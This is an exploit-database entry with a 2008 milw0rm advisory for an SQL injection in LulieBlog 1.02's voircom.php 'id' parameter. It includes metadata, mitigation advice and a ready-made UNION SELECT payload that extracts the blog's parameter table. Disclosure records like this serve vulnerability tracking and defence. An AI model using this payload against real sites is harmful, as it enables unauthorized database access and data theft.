LulieBlog Version 1.02 Remote Sql Injection

vendor:

LulieBlog

by:

IRCRASH (Dr.Crash)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: LulieBlog

Affected Version From: 01.02

Affected Version To: 01.02

Patch Exists: NO

Related CWE: N/A

CPE: a:lulieblog:lulieblog:1.02

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

LulieBlog Version 1.02 Remote Sql Injection

A vulnerability exists in LulieBlog Version 1.02 which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in 'voircom.php'. An attacker can exploit this vulnerability to gain access to sensitive information from the database, modify data, delete data, or gain access to the server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input to ensure that it conforms to the expected format, using centralized routines whenever possible. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#####################################################################################
####              LulieBlog Version 1.02 Remote Sql Injection                    ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://sourceforge.net/project/platformdownload.php?group_id=204083
#                                                                                   #
#Injection Adress :  http://Sitename/voircom.php?id=[SQL CODE]                      #
#                                                                                   #
#                                                                                   #
#[SQL CODE] : -1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-23]